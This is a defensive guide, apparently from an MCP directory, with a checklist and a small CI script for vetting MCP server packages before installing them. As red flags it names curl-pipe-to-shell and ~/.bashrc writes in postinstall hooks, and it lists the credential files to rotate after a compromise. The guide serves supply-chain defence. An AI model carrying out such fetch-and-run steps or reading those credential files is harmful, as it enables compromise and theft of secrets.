Pinning versions and reading the source is the high-effort defence. This guide is for the lower-effort everyday case: a quick checklist you can run against any MCP server in under five minutes before you trust it with your environment.
The 5-minute trust checklist
Before you paste a config into Claude Desktop, walk through these five checks. Anything that fails twice means do not install.
1. Identify the publisher
Open the npm or PyPI page. Is the publisher a known org (Anthropic, modelcontextprotocol, Microsoft, the project’s GitHub org)? A solo maintainer with two packages and an empty bio is a yellow flag, not red — but it raises the bar on the rest of the checks.
2. Compare downloads vs. stars
A package with 50,000 weekly downloads but 12 GitHub stars is suspicious. Real popular projects accumulate stars proportional to use. The mismatch usually means typosquatting or download-count gaming.
3. Look at the dependency tree
npm view @vendor/mcp-server dependencies
# or
npm ls --all @vendor/mcp-serverRed flags: node-fetch when the server claims to be filesystem-only, dns/net requires in a docs server, network libraries that have nothing to do with the advertised function.
4. Read the postinstall script
npm view @vendor/mcp-server scriptsIf postinstall exists, read it. Legitimate servers rarely need one. Anything that curl | sh or writes to ~/.bashrc from a postinstall script is hostile.
5. Run it in a sandbox first
Spin it up in a fresh Docker container or a VM. Watch for unexpected outbound traffic with tcpdump or mitmproxy. A one-minute observation usually reveals beacon-style callbacks.
Automating the check
For teams installing many servers, the manual checklist does not scale. A pragmatic CI step:
# package-audit.sh
PKG=$1
npm audit --json --package=$PKG | jq '.vulnerabilities'
npm view $PKG repository.url
npm view $PKG scripts | grep -E 'postinstall|preinstall' && exit 1
echo "OK"Run it on every MCP package added to your team config. See our team config guide for how to wire this into a shared workflow.
What scanners exist today
As of April 2026, three tools cover the MCP-specific surface area:
- Socket.dev — generic supply-chain scanner with rules tuned for AI tooling.
- npq — wraps
npm installwith safety prompts. Old but still useful. - mcp-audit (community) — early-stage CLI specifically for MCP packages. Watch the repo.
The deeper signal: behaviour at runtime
Static checks miss runtime behaviour. The strongest signal is what the server actually does after it runs. A safe MCP server only:
- Touches files inside its declared scope.
- Speaks JSON-RPC 2.0 over stdio.
- Talks to the network only if its purpose requires it (HTTP MCP, browser MCP).
Anything else is noise to investigate. Run the server with strace (Linux), fs_usage (macOS) or Process Monitor (Windows) for the first five minutes you install it. Save the output. Compare on update.
What to do if you suspect compromise
- Kill the MCP host (Claude Desktop, Cursor) immediately.
- Rotate every credential that lived in your MCP
envblocks. - Rotate any secret that lived in
~/.aws/credentials,~/.config/git,~/.ssh/. - File an issue with the registry maintainer (npm, PyPI, our directory) so others get warned.